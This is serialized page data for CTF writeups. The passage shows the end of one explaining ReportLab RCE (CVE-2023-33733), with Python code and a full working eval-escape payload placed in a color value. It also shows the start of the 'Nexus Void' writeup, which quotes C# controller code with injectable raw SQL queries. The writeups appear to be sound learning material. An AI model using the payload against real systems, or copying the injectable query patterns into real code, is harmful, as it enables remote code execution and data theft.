self.stream_file\n",[34444],{"type":33,"tag":105,"props":34445,"children":34446},{"__ignoreMap":8},[34447,34504,34542,34571,34592,34599,34614,34637,34667,34692,34699,34714,34721,34761,34807,34835,34863,34908],{"type":33,"tag":128,"props":34448,"children":34449},{"class":130,"line":131},[34450,34455,34460,34464,34469,34473,34478,34482,34487,34491,34495,34499],{"type":33,"tag":128,"props":34451,"children":34452},{"style":1576},[34453],{"type":38,"value":34454},"from",{"type":33,"tag":128,"props":34456,"children":34457},{"style":323},[34458],{"type":38,"value":34459}," reportlab",{"type":33,"tag":128,"props":34461,"children":34462},{"style":312},[34463],{"type":38,"value":215},{"type":33,"tag":128,"props":34465,"children":34466},{"style":323},[34467],{"type":38,"value":34468},"platypus ",{"type":33,"tag":128,"props":34470,"children":34471},{"style":1576},[34472],{"type":38,"value":10244},{"type":33,"tag":128,"props":34474,"children":34475},{"style":323},[34476],{"type":38,"value":34477}," SimpleDocTemplate",{"type":33,"tag":128,"props":34479,"children":34480},{"style":312},[34481],{"type":38,"value":5584},{"type":33,"tag":128,"props":34483,"children":34484},{"style":323},[34485],{"type":38,"value":34486}," Paragraph",{"type":33,"tag":128,"props":34488,"children":34489},{"style":312},[34490],{"type":38,"value":5584},{"type":33,"tag":128,"props":34492,"children":34493},{"style":323},[34494],{"type":38,"value":26558},{"type":33,"tag":128,"props":34496,"children":34497},{"style":312},[34498],{"type":38,"value":5584},{"type":33,"tag":128,"props":34500,"children":34501},{"style":323},[34502],{"type":38,"value":34503}," TableStyle\n",{"type":33,"tag":128,"props":34505,"children":34506},{"class":130,"line":362},[34507,34511,34515,34519,34524,34528,34533,34537],{"type":33,"tag":128,"props":34508,"children":34509},{"style":1576},[34510],{"type":38,"value":34454},{"type":33,"tag":128,"props":34512,"children":34513},{"style":323},[34514],{"type":38,"value":34459},{"type":33,"tag":128,"props":34516,"children":34517},{"style":312},[34518],{"type":38,"value":215},{"type":33,"tag":128,"props":34520,"children":34521},{"style":323},[34522],{"type":38,"value":34523},"lib",{"type":33,"tag":128,"props":34525,"children":34526},{"style":312},[34527],{"type":38,"value":215},{"type":33,"tag":128,"props":34529,"children":34530},{"style":323},[34531],{"type":38,"value":34532},"pagesizes ",{"type":33,"tag":128,"props":34534,"children":34535},{"style":1576},[34536],{"type":38,"value":10244},{"type":33,"tag":128,"props":34538,"children":34539},{"style":323},[34540],{"type":38,"value":34541}," letter\n",{"type":33,"tag":128,"props":34543,"children":34544},{"class":130,"line":403},[34545,34549,34553,34557,34562,34566],{"type":33,"tag":128,"props":34546,"children":34547},{"style":1576},[34548],{"type":38,"value":34454},{"type":33,"tag":128,"props":34550,"children":34551},{"style":323},[34552],{"type":38,"value":34459},{"type":33,"tag":128,"props":34554,"children":34555},{"style":312},[34556],{"type":38,"value":215},{"type":33,"tag":128,"props":34558,"children":34559},{"style":323},[34560],{"type":38,"value":34561},"lib ",{"type":33,"tag":128,"props":34563,"children":34564},{"style":1576},[34565],{"type":38,"value":10244},{"type":33,"tag":128,"props":34567,"children":34568},{"style":323},[34569],{"type":38,"value":34570}," colors\n",{"type":33,"tag":128,"props":34572,"children":34573},{"class":130,"line":739},[34574,34578,34583,34587],{"type":33,"tag":128,"props":34575,"children":34576},{"style":1576},[34577],{"type":38,"value":34454},{"type":33,"tag":128,"props":34579,"children":34580},{"style":323},[34581],{"type":38,"value":34582}," io ",{"type":33,"tag":128,"props":34584,"children":34585},{"style":1576},[34586],{"type":38,"value":10244},{"type":33,"tag":128,"props":34588,"children":34589},{"style":323},[34590],{"type":38,"value":34591}," BytesIO\n",{"type":33,"tag":128,"props":34593,"children":34594},{"class":130,"line":765},[34595],{"type":33,"tag":128,"props":34596,"children":34597},{"emptyLinePlaceholder":896},[34598],{"type":38,"value":899},{"type":33,"tag":128,"props":34600,"children":34601},{"class":130,"line":804},[34602,34606,34610],{"type":33,"tag":128,"props":34603,"children":34604},{"style":300},[34605],{"type":38,"value":30336},{"type":33,"tag":128,"props":34607,"children":34608},{"style":30339},[34609],{"type":38,"value":34103},{"type":33,"tag":128,"props":34611,"children":34612},{"style":312},[34613],{"type":38,"value":10412},{"type":33,"tag":128,"props":34615,"children":34616},{"class":130,"line":839},[34617,34621,34625,34629,34633],{"type":33,"tag":128,"props":34618,"children":34619},{"style":300},[34620],{"type":38,"value":30678},{"type":33,"tag":128,"props":34622,"children":34623},{"style":437},[34624],{"type":38,"value":30683},{"type":33,"tag":128,"props":34626,"children":34627},{"style":312},[34628],{"type":38,"value":5566},{"type":33,"tag":128,"props":34630,"children":34631},{"style":323},[34632],{"type":38,"value":30091},{"type":33,"tag":128,"props":34634,"children":34635},{"style":312},[34636],{"type":38,"value":10497},{"type":33,"tag":128,"props":34638,"children":34639},{"class":130,"line":848},[34640,34645,34649,34654,34658,34663],{"type":33,"tag":128,"props":34641,"children":34642},{"style":151},[34643],{"type":38,"value":34644}," self",{"type":33,"tag":128,"props":34646,"children":34647},{"style":312},[34648],{"type":38,"value":215},{"type":33,"tag":128,"props":34650,"children":34651},{"style":323},[34652],{"type":38,"value":34653},"stream_file ",{"type":33,"tag":128,"props":34655,"children":34656},{"style":312},[34657],{"type":38,"value":315},{"type":33,"tag":128,"props":34659,"children":34660},{"style":323},[34661],{"type":38,"value":34662}," BytesIO",{"type":33,"tag":128,"props":34664,"children":34665},{"style":312},[34666],{"type":38,"value":7857},{"type":33,"tag":128,"props":34668,"children":34669},{"class":130,"line":976},[34670,34674,34678,34683,34687],{"type":33,"tag":128,"props":34671,"children":34672},{"style":151},[34673],{"type":38,"value":34644},{"type":33,"tag":128,"props":34675,"children":34676},{"style":312},[34677],{"type":38,"value":215},{"type":33,"tag":128,"props":34679,"children":34680},{"style":323},[34681],{"type":38,"value":34682},"content ",{"type":33,"tag":128,"props":34684,"children":34685},{"style":312},[34686],{"type":38,"value":315},{"type":33,"tag":128,"props":34688,"children":34689},{"style":312},[34690],{"type":38,"value":34691}," []\n",{"type":33,"tag":128,"props":34693,"children":34694},{"class":130,"line":988},[34695],{"type":33,"tag":128,"props":34696,"children":34697},{"emptyLinePlaceholder":896},[34698],{"type":38,"value":899},{"type":33,"tag":128,"props":34700,"children":34701},{"class":130,"line":1001},[34702,34706,34710],{"type":33,"tag":128,"props":34703,"children":34704},{"style":312},[34705],{"type":38,"value":344},{"type":33,"tag":128,"props":34707,"children":34708},{"style":151},[34709],{"type":38,"value":29750},{"type":33,"tag":128,"props":34711,"children":34712},{"style":312},[34713],{"type":38,"value":3262},{"type":33,"tag":128,"props":34715,"children":34716},{"class":130,"line":1014},[34717],{"type":33,"tag":128,"props":34718,"children":34719},{"emptyLinePlaceholder":896},[34720],{"type":38,"value":899},{"type":33,"tag":128,"props":34722,"children":34723},{"class":130,"line":1026},[34724,34728,34733,34737,34741,34745,34749,34753,34757],{"type":33,"tag":128,"props":34725,"children":34726},{"style":300},[34727],{"type":38,"value":30678},{"type":33,"tag":128,"props":34729,"children":34730},{"style":135},[34731],{"type":38,"value":34732}," convert",{"type":33,"tag":128,"props":34734,"children":34735},{"style":312},[34736],{"type":38,"value":5566},{"type":33,"tag":128,"props":34738,"children":34739},{"style":323},[34740],{"type":38,"value":30091},{"type":33,"tag":128,"props":34742,"children":34743},{"style":312},[34744],{"type":38,"value":5584},{"type":33,"tag":128,"props":34746,"children":34747},{"style":323},[34748],{"type":38,"value":14570},{"type":33,"tag":128,"props":34750,"children":34751},{"style":312},[34752],{"type":38,"value":5584},{"type":33,"tag":128,"props":34754,"children":34755},{"style":323},[34756],{"type":38,"value":13545},{"type":33,"tag":128,"props":34758,"children":34759},{"style":312},[34760],{"type":38,"value":10497},{"type":33,"tag":128,"props":34762,"children":34763},{"class":130,"line":1038},[34764,34769,34773,34777,34781,34786,34790,34794,34798,34803],{"type":33,"tag":128,"props":34765,"children":34766},{"style":323},[34767],{"type":38,"value":34768}," doc ",{"type":33,"tag":128,"props":34770,"children":34771},{"style":312},[34772],{"type":38,"value":315},{"type":33,"tag":128,"props":34774,"children":34775},{"style":151},[34776],{"type":38,"value":30721},{"type":33,"tag":128,"props":34778,"children":34779},{"style":312},[34780],{"type":38,"value":215},{"type":33,"tag":128,"props":34782,"children":34783},{"style":323},[34784],{"type":38,"value":34785},"get_document_template",{"type":33,"tag":128,"props":34787,"children":34788},{"style":312},[34789],{"type":38,"value":5566},{"type":33,"tag":128,"props":34791,"children":34792},{"style":151},[34793],{"type":38,"value":30091},{"type":33,"tag":128,"props":34795,"children":34796},{"style":312},[34797],{"type":38,"value":215},{"type":33,"tag":128,"props":34799,"children":34800},{"style":323},[34801],{"type":38,"value":34802},"stream_file",{"type":33,"tag":128,"props":34804,"children":34805},{"style":312},[34806],{"type":38,"value":2427},{"type":33,"tag":128,"props":34808,"children":34809},{"class":130,"line":1051},[34810,34814,34818,34823,34827,34831],{"type":33,"tag":128,"props":34811,"children":34812},{"style":151},[34813],{"type":38,"value":34644},{"type":33,"tag":128,"props":34815,"children":34816},{"style":312},[34817],{"type":38,"value":215},{"type":33,"tag":128,"props":34819,"children":34820},{"style":323},[34821],{"type":38,"value":34822},"add_paragraph",{"type":33,"tag":128,"props":34824,"children":34825},{"style":312},[34826],{"type":38,"value":5566},{"type":33,"tag":128,"props":34828,"children":34829},{"style":323},[34830],{"type":38,"value":5929},{"type":33,"tag":128,"props":34832,"children":34833},{"style":312},[34834],{"type":38,"value":2427},{"type":33,"tag":128,"props":34836,"children":34837},{"class":130,"line":1063},[34838,34842,34846,34851,34855,34859],{"type":33,"tag":128,"props":34839,"children":34840},{"style":151},[34841],{"type":38,"value":34644},{"type":33,"tag":128,"props":34843,"children":34844},{"style":312},[34845],{"type":38,"value":215},{"type":33,"tag":128,"props":34847,"children":34848},{"style":323},[34849],{"type":38,"value":34850},"add_table",{"type":33,"tag":128,"props":34852,"children":34853},{"style":312},[34854],{"type":38,"value":5566},{"type":33,"tag":128,"props":34856,"children":34857},{"style":323},[34858],{"type":38,"value":2815},{"type":33,"tag":128,"props":34860,"children":34861},{"style":312},[34862],{"type":38,"value":2427},{"type":33,"tag":128,"props":34864,"children":34865},{"class":130,"line":1076},[34866,34870,34874,34879,34883,34888,34892,34896,34900,34904],{"type":33,"tag":128,"props":34867,"children":34868},{"style":151},[34869],{"type":38,"value":34644},{"type":33,"tag":128,"props":34871,"children":34872},{"style":312},[34873],{"type":38,"value":215},{"type":33,"tag":128,"props":34875,"children":34876},{"style":323},[34877],{"type":38,"value":34878},"build_document",{"type":33,"tag":128,"props":34880,"children":34881},{"style":312},[34882],{"type":38,"value":5566},{"type":33,"tag":128,"props":34884,"children":34885},{"style":323},[34886],{"type":38,"value":34887},"doc",{"type":33,"tag":128,"props":34889,"children":34890},{"style":312},[34891],{"type":38,"value":5584},{"type":33,"tag":128,"props":34893,"children":34894},{"style":151},[34895],{"type":38,"value":30721},{"type":33,"tag":128,"props":34897,"children":34898},{"style":312},[34899],{"type":38,"value":215},{"type":33,"tag":128,"props":34901,"children":34902},{"style":323},[34903],{"type":38,"value":5242},{"type":33,"tag":128,"props":34905,"children":34906},{"style":312},[34907],{"type":38,"value":2427},{"type":33,"tag":128,"props":34909,"children":34910},{"class":130,"line":1089},[34911,34915,34919,34923],{"type":33,"tag":128,"props":34912,"children":34913},{"style":1576},[34914],{"type":38,"value":13615},{"type":33,"tag":128,"props":34916,"children":34917},{"style":151},[34918],{"type":38,"value":30721},{"type":33,"tag":128,"props":34920,"children":34921},{"style":312},[34922],{"type":38,"value":215},{"type":33,"tag":128,"props":34924,"children":34925},{"style":323},[34926],{"type":38,"value":34927},"stream_file\n",{"type":33,"tag":47,"props":34929,"children":34930},{},[34931,34933,34939],{"type":38,"value":34932},"This library is known to be vulnerable to RCE attacks. The vulnerability is present due to inadequate validations within the ",{"type":33,"tag":105,"props":34934,"children":34936},{"className":34935},[],[34937],{"type":38,"value":34938},"rl_safe_eval",{"type":38,"value":34940}," function, attackers have the ability to insert malicious code into an HTML document, which will then be converted into a PDF using software that relies on the ReportLab library. To exploit this vulnerability, the entire malicious code must be activated through eval within a single expression. This vulnerability is referenced as CVE-2023-33733.",{"type":33,"tag":47,"props":34942,"children":34943},{},[34944,34946,34953],{"type":38,"value":34945},"For more details, ",{"type":33,"tag":53,"props":34947,"children":34950},{":target":21222,"href":34948,"rel":34949},"https://github.com/c53elyas/CVE-2023-33733",[57],[34951],{"type":38,"value":34952},"the article of c53elyas",{"type":38,"value":34954}," explains the vulnerability in depth.",{"type":33,"tag":47,"props":34956,"children":34957},{},[34958],{"type":33,"tag":2572,"props":34959,"children":34960},{},[34961],{"type":38,"value":34962},"It is important to note that this exploit is only possible if the application allow hostile input to be passed into colors. This is exactly our case, as we control the variable color that is used in the render_template function.",{"type":33,"tag":47,"props":34964,"children":34965},{},[34966],{"type":38,"value":34967},"The payload that will be executed to exploit the RCE during our final exploit is as follows:",{"type":33,"tag":114,"props":34969,"children":34970},{"lang":25649},[34971],{"type":33,"tag":119,"props":34972,"children":34974},{"className":27370,"code":34973,"language":25649,"meta":8,"style":8},"[[[getattr(pow, Word('__globals__'))['os'].system('echo pwned') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated \u003C 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'\n",[34975],{"type":33,"tag":105,"props":34976,"children":34977},{"__ignoreMap":8},[34978],{"type":33,"tag":128,"props":34979,"children":34980},{"class":130,"line":131},[34981],{"type":33,"tag":128,"props":34982,"children":34983},{},[34984],{"type":38,"value":34973},{"type":33,"tag":47,"props":34986,"children":34987},{},[34988],{"type":38,"value":34989},"There is the final request that will allow us to exploit the vulnerability:",{"type":33,"tag":75,"props":34991,"children":34993},{"imgSrc":34992},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322788/writeups/phantom-feed/last_request.webp",[],{"type":33,"tag":47,"props":34995,"children":34996},{},[34997],{"type":38,"value":34998},"We can see the flag sent successfuly to our collaborator:",{"type":33,"tag":75,"props":35000,"children":35002},{"imgSrc":35001},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322779/writeups/phantom-feed/flag_collaborator.webp",[],{"type":33,"tag":5227,"props":35004,"children":35005},{},[35006],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":35008},[35009,35010,35011,35012,35013],{"id":42,"depth":362,"text":45},{"id":29558,"depth":362,"text":29561},{"id":31444,"depth":362,"text":31447},{"id":32140,"depth":362,"text":32143},{"id":33667,"depth":362,"text":33670},"content:writeups:phantom-feed.md","writeups/phantom-feed.md","writeups/phantom-feed",{"_path":35018,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":35019,"description":8,"head":35020,"body":35037,"_type":5240,"_id":40188,"_source":5242,"_file":40189,"_stem":40190,"_extension":5245},"/writeups/nexus-void","Nexus Void",{"title":35019,"description":35021,"keywords":35022,"slug":35023,"image":29235,"date":35024,"meta":35025},"Writeup of Nexus Void a medium web challenge from htb-uni ctf 2023. Is about sql injection and deserialization.","web,sqli,deserialization","nexus-void","2023-12-07",[35026,35027,35029,35030,35031,35033,35034,35035],{"og:image":29235},{"og:title":35028},"Nexus Void writeup",{"og:description":35021},{"og:type":21},{"og:url":35032},"https://owalid.com/nexus-void",{"description":35021},{"title":35028},{"keywords":35036},"web,sqli,deserialization,htb,ctf,writeup",{"type":30,"children":35038,"toc":40182},[35039,35043,35047,35052,35056,35062,35067,35072,36584,36589,36595,36600,36605,37022,37027,37684,37692,37698,37703,37708,37713,37718,37723,37728,37733,37738,38383,38388,38399,38405,38410,38423,38593,38598,38609,38629,38639,38644,38657,39104,39117,39829,39841,39846,39852,39857,39863,39875,39880,39972,39977,39982,40001,40012,40018,40023,40028,40032,40037,40041,40046,40050,40062,40131,40143,40148,40156,40160,40165,40169,40174,40178],{"type":33,"tag":34,"props":35040,"children":35041},{"id":35023},[35042],{"type":38,"value":35019},{"type":33,"tag":40,"props":35044,"children":35045},{"id":42},[35046],{"type":38,"value":45},{"type":33,"tag":47,"props":35048,"children":35049},{},[35050],{"type":38,"value":35051},"Nexus Void is a medium web challenge from htb-uni ctf 2023. Is about sql injection and deserialization. The code is written in c# and the database is sqlite.",{"type":33,"tag":75,"props":35053,"children":35055},{"imgSrc":35054,":width":29267},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704402027/writeups/nexus-void/architecture_challenge.webp",[],{"type":33,"tag":40,"props":35057,"children":35059},{"id":35058},"sqli",[35060],{"type":38,"value":35061},"Sqli",{"type":33,"tag":47,"props":35063,"children":35064},{},[35065],{"type":38,"value":35066},"If we carefully read the source code, we can see that no query to the database is protected. They are all vulnerable to SQL injection.",{"type":33,"tag":47,"props":35068,"children":35069},{},[35070],{"type":38,"value":35071},"Here are some examples below:",{"type":33,"tag":114,"props":35073,"children":35075},{"lang":35074},"csharp",[35076],{"type":33,"tag":119,"props":35077,"children":35080},{"code":35078,"language":35074,"meta":8,"className":35079,"style":8},"// Controllers/HomeController.cs\npublic IActionResult Wishlist()\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\"; // \u003C--- SQLI\n\n [...]\n}\n[...]\n\npublic IActionResult Wishlist(string name, string sellerName)\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID={ID}\"; // \u003C--- SQLI\n var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n string sqlQueryProduct = $\"SELECT * from Products WHERE name='{name}' AND sellerName='{sellerName}'\"; // \u003C--- SQLI\n var product = _db.Products.FromSqlRaw(sqlQueryProduct).FirstOrDefault();\n if(!string.IsNullOrEmpty(product.name))\n {\n if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n {\n List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n ProductModel result = products.Find(x => x.name == product.name);\n\n if (result != null)\n {\n return Content(\"Product already exists\");\n }\n\n products.Add(product);\n string serializedData = SerializeHelper.Serialize(products);\n string sqlQueryAddWishlist = $\"UPDATE Wishlist SET data='{serializedData}' WHERE ID={ID}\"; // \u003C--- SQLI\n _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n }\n else\n {\n string username = HttpContext.Items[\"username\"].ToString();\n List\u003CProductModel> wishListProducts = new List\u003CProductModel>();\n wishListProducts.Add(product);\n string serializedData = SerializeHelper.Serialize(wishListProducts);\n string sqlQueryAddWishlist = $\"INSERT INTO Wishlist(ID, username, data) VALUES({ID},'{username}', '{serializedData}')\"; // \u003C--- SQLI\n _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n }\n return Content(\"Added\");\n }\n return Content(\"Invalid\");\n}\n","language-csharp shiki shiki-themes vitesse-dark",[35081],{"type":33,"tag":105,"props":35082,"children":35083},{"__ignoreMap":8},[35084,35092,35113,35120,35181,35237,35244,35265,35272,35287,35294,35340,35347,35402,35450,35512,35583,35641,35690,35697,35764,35772,35836,35911,35918,35947,35955,35989,35997,36004,36033,36076,36143,36182,36189,36197,36204,36260,36310,36338,36378,36465,36500,36507,36539,36546,36577],{"type":33,"tag":128,"props":35085,"children":35086},{"class":130,"line":131},[35087],{"type":33,"tag":128,"props":35088,"children":35089},{"style":5541},[35090],{"type":38,"value":35091},"// Controllers/HomeController.cs\n",{"type":33,"tag":128,"props":35093,"children":35094},{"class":130,"line":362},[35095,35099,35104,35109],{"type":33,"tag":128,"props":35096,"children":35097},{"style":300},[35098],{"type":38,"value":25953},{"type":33,"tag":128,"props":35100,"children":35101},{"style":30339},[35102],{"type":38,"value":35103}," IActionResult",{"type":33,"tag":128,"props":35105,"children":35106},{"style":135},[35107],{"type":38,"value":35108}," Wishlist",{"type":33,"tag":128,"props":35110,"children":35111},{"style":312},[35112],{"type":38,"value":7857},{"type":33,"tag":128,"props":35114,"children":35115},{"class":130,"line":403},[35116],{"type":33,"tag":128,"props":35117,"children":35118},{"style":312},[35119],{"type":38,"value":650},{"type":33,"tag":128,"props":35121,"children":35122},{"class":130,"line":739},[35123,35128,35133,35137,35142,35146,35151,35155,35159,35164,35168,35172,35177],{"type":33,"tag":128,"props":35124,"children":35125},{"style":1576},[35126],{"type":38,"value":35127}," string",{"type":33,"tag":128,"props":35129,"children":35130},{"style":135},[35131],{"type":38,"value":35132}," ID",{"type":33,"tag":128,"props":35134,"children":35135},{"style":312},[35136],{"type":38,"value":5657},{"type":33,"tag":128,"props":35138,"children":35139},{"style":306},[35140],{"type":38,"value":35141}," HttpContext",{"type":33,"tag":128,"props":35143,"children":35144},{"style":312},[35145],{"type":38,"value":215},{"type":33,"tag":128,"props":35147,"children":35148},{"style":306},[35149],{"type":38,"value":35150},"Items",{"type":33,"tag":128,"props":35152,"children":35153},{"style":312},[35154],{"type":38,"value":344},{"type":33,"tag":128,"props":35156,"children":35157},{"style":676},[35158],{"type":38,"value":669},{"type":33,"tag":128,"props":35160,"children":35161},{"style":140},[35162],{"type":38,"value":35163},"ID",{"type":33,"tag":128,"props":35165,"children":35166},{"style":676},[35167],{"type":38,"value":669},{"type":33,"tag":128,"props":35169,"children":35170},{"style":312},[35171],{"type":38,"value":8230},{"type":33,"tag":128,"props":35173,"children":35174},{"style":135},[35175],{"type":38,"value":35176},"ToString",{"type":33,"tag":128,"props":35178,"children":35179},{"style":312},[35180],{"type":38,"value":15496},{"type":33,"tag":128,"props":35182,"children":35183},{"class":130,"line":765},[35184,35188,35193,35197,35202,35207,35211,35215,35219,35223,35227,35232],{"type":33,"tag":128,"props":35185,"children":35186},{"style":1576},[35187],{"type":38,"value":35127},{"type":33,"tag":128,"props":35189,"children":35190},{"style":135},[35191],{"type":38,"value":35192}," sqlQueryGetWishlist",{"type":33,"tag":128,"props":35194,"children":35195},{"style":312},[35196],{"type":38,"value":5657},{"type":33,"tag":128,"props":35198,"children":35199},{"style":676},[35200],{"type":38,"value":35201}," $\"",{"type":33,"tag":128,"props":35203,"children":35204},{"style":140},[35205],{"type":38,"value":35206},"SELECT * from Wishlist WHERE ID='",{"type":33,"tag":128,"props":35208,"children":35209},{"style":312},[35210],{"type":38,"value":7246},{"type":33,"tag":128,"props":35212,"children":35213},{"style":140},[35214],{"type":38,"value":35163},{"type":33,"tag":128,"props":35216,"children":35217},{"style":312},[35218],{"type":38,"value":5730},{"type":33,"tag":128,"props":35220,"children":35221},{"style":140},[35222],{"type":38,"value":6040},{"type":33,"tag":128,"props":35224,"children":35225},{"style":676},[35226],{"type":38,"value":669},{"type":33,"tag":128,"props":35228,"children":35229},{"style":312},[35230],{"type":38,"value":35231},";",{"type":33,"tag":128,"props":35233,"children":35234},{"style":5541},[35235],{"type":38,"value":35236}," // \u003C--- SQLI\n",{"type":33,"tag":128,"props":35238,"children":35239},{"class":130,"line":804},[35240],{"type":33,"tag":128,"props":35241,"children":35242},{"emptyLinePlaceholder":896},[35243],{"type":38,"value":899},{"type":33,"tag":128,"props":35245,"children":35246},{"class":130,"line":839},[35247,35252,35257,35261],{"type":33,"tag":128,"props":35248,"children":35249},{"style":312},[35250],{"type":38,"value":35251}," [",{"type":33,"tag":128,"props":35253,"children":35254},{"style":300},[35255],{"type":38,"value":35256},"..",{"type":33,"tag":128,"props":35258,"children":35259},{"style":323},[35260],{"type":38,"value":215},{"type":33,"tag":128,"props":35262,"children":35263},{"style":312},[35264],{"type":38,"value":3262},{"type":33,"tag":128,"props":35266,"children":35267},{"class":130,"line":848},[35268],{"type":33,"tag":128,"props":35269,"children":35270},{"style":312},[35271],{"type":38,"value":854},{"type":33,"tag":128,"props":35273,"children":35274},{"class":130,"line":976},[35275,35279,35283],{"type":33,"tag":128,"props":35276,"children":35277},{"style":312},[35278],{"type":38,"value":344},{"type":33,"tag":128,"props":35280,"children":35281},{"style":323},[35282],{"type":38,"value":29750},{"type":33,"tag":128,"props":35284,"children":35285},{"style":312},[35286],{"type":38,"value":3262},{"type":33,"tag":128,"props":35288,"children":35289},{"class":130,"line":988},[35290],{"type":33,"tag":128,"props":35291,"children":35292},{"emptyLinePlaceholder":896},[35293],{"type":38,"value":899},{"type":33,"tag":128,"props":35295,"children":35296},{"class":130,"line":1001},[35297,35301,35305,35309,35313,35318,35322,35326,35331,35336],{"type":33,"tag":128,"props":35298,"children":35299},{"style":300},[35300],{"type":38,"value":25953},{"type":33,"tag":128,"props":35302,"children":35303},{"style":30339},[35304],{"type":38,"value":35103},{"type":33,"tag":128,"props":35306,"children":35307},{"style":135},[35308],{"type":38,"value":35108},{"type":33,"tag":128,"props":35310,"children":35311},{"style":312},[35312],{"type":38,"value":5566},{"type":33,"tag":128,"props":35314,"children":35315},{"style":1576},[35316],{"type":38,"value":35317},"string",{"type":33,"tag":128,"props":35319,"children":35320},{"style":135},[35321],{"type":38,"value":14688},{"type":33,"tag":128,"props":35323,"children":35324},{"style":312},[35325],{"type":38,"value":5584},{"type":33,"tag":128,"props":35327,"children":35328},{"style":1576},[35329],{"type":38,"value":35330}," string",{"type":33,"tag":128,"props":35332,"children":35333},{"style":135},[35334],{"type":38,"value":35335}," sellerName",{"type":33,"tag":128,"props":35337,"children":35338},{"style":312},[35339],{"type":38,"value":2427},{"type":33,"tag":128,"props":35341,"children":35342},{"class":130,"line":1014},[35343],{"type":33,"tag":128,"props":35344,"children":35345},{"style":312},[35346],{"type":38,"value":650},{"type":33,"tag":128,"props":35348,"children":35349},{"class":130,"line":1026},[35350,35354,35358,35362,35366,35370,35374,35378,35382,35386,35390,35394,35398],{"type":33,"tag":128,"props":35351,"children":35352},{"style":1576},[35353],{"type":38,"value":35127},{"type":33,"tag":128,"props":35355,"children":35356},{"style":135},[35357],{"type":38,"value":35132},{"type":33,"tag":128,"props":35359,"children":35360},{"style":312},[35361],{"type":38,"value":5657},{"type":33,"tag":128,"props":35363,"children":35364},{"style":306},[35365],{"type":38,"value":35141},{"type":33,"tag":128,"props":35367,"children":35368},{"style":312},[35369],{"type":38,"value":215},{"type":33,"tag":128,"props":35371,"children":35372},{"style":306},[35373],{"type":38,"value":35150},{"type":33,"tag":128,"props":35375,"children":35376},{"style":312},[35377],{"type":38,"value":344},{"type":33,"tag":128,"props":35379,"children":35380},{"style":676},[35381],{"type":38,"value":669},{"type":33,"tag":128,"props":35383,"children":35384},{"style":140},[35385],{"type":38,"value":35163},{"type":33,"tag":128,"props":35387,"children":35388},{"style":676},[35389],{"type":38,"value":669},{"type":33,"tag":128,"props":35391,"children":35392},{"style":312},[35393],{"type":38,"value":8230},{"type":33,"tag":128,"props":35395,"children":35396},{"style":135},[35397],{"type":38,"value":35176},{"type":33,"tag":128,"props":35399,"children":35400},{"style":312},[35401],{"type":38,"value":15496},{"type":33,"tag":128,"props":35403,"children":35404},{"class":130,"line":1038},[35405,35409,35413,35417,35421,35426,35430,35434,35438,35442,35446],{"type":33,"tag":128,"props":35406,"children":35407},{"style":1576},[35408],{"type":38,"value":35127},{"type":33,"tag":128,"props":35410,"children":35411},{"style":135},[35412],{"type":38,"value":35192},{"type":33,"tag":128,"props":35414,"children":35415},{"style":312},[35416],{"type":38,"value":5657},{"type":33,"tag":128,"props":35418,"children":35419},{"style":676},[35420],{"type":38,"value":35201},{"type":33,"tag":128,"props":35422,"children":35423},{"style":140},[35424],{"type":38,"value":35425},"SELECT * from Wishlist WHERE ID=",{"type":33,"tag":128,"props":35427,"children":35428},{"style":312},[35429],{"type":38,"value":7246},{"type":33,"tag":128,"props":35431,"children":35432},{"style":140},[35433],{"type":38,"value":35163},{"type":33,"tag":128,"props":35435,"children":35436},{"style":312},[35437],{"type":38,"value":5730},{"type":33,"tag":128,"props":35439,"children":35440},{"style":676},[35441],{"type":38,"value":669},{"type":33,"tag":128,"props":35443,"children":35444},{"style":312},[35445],{"type":38,"value":35231},{"type":33,"tag":128,"props":35447,"children":35448},{"style":5541},[35449],{"type":38,"value":35236},{"type":33,"tag":128,"props":35451,"children":35452},{"class":130,"line":1051},[35453,35458,35463,35467,35472,35476,35481,35485,35490,35494,35499,35503,35508],{"type":33,"tag":128,"props":35454,"children":35455},{"style":300},[35456],{"type":38,"value":35457}," var",{"type":33,"tag":128,"props":35459,"children":35460},{"style":135},[35461],{"type":38,"value":35462}," wishlist",{"type":33,"tag":128,"props":35464,"children":35465},{"style":312},[35466],{"type":38,"value":5657},{"type":33,"tag":128,"props":35468,"children":35469},{"style":306},[35470],{"type":38,"value":35471}," _db",{"type":33,"tag":128,"props":35473,"children":35474},{"style":312},[35475],{"type":38,"value":215},{"type":33,"tag":128,"props":35477,"children":35478},{"style":306},[35479],{"type":38,"value":35480},"Wishlist",{"type":33,"tag":128,"props":35482,"children":35483},{"style":312},[35484],{"type":38,"value":215},{"type":33,"tag":128,"props":35486,"children":35487},{"style":135},[35488],{"type":38,"value":35489},"FromSqlRaw",{"type":33,"tag":128,"props":35491,"children":35492},{"style":312},[35493],{"type":38,"value":5566},{"type":33,"tag":128,"props":35495,"children":35496},{"style":306},[35497],{"type":38,"value":35498},"sqlQueryGetWishlist",{"type":33,"tag":128,"props":35500,"children":35501},{"style":312},[35502],{"type":38,"value":6700},{"type":33,"tag":128,"props":35504,"children":35505},{"style":135},[35506],{"type":38,"value":35507},"FirstOrDefault",{"type":33,"tag":128,"props":35509,"children":35510},{"style":312},[35511],{"type":38,"value":15496},{"type":33,"tag":128,"props":35513,"children":35514},{"class":130,"line":1063},[35515,35519,35524,35528,35532,35537,35541,35545,35549,35554,35558,35563,35567,35571,35575,35579],{"type":33,"tag":128,"props":35516,"children":35517},{"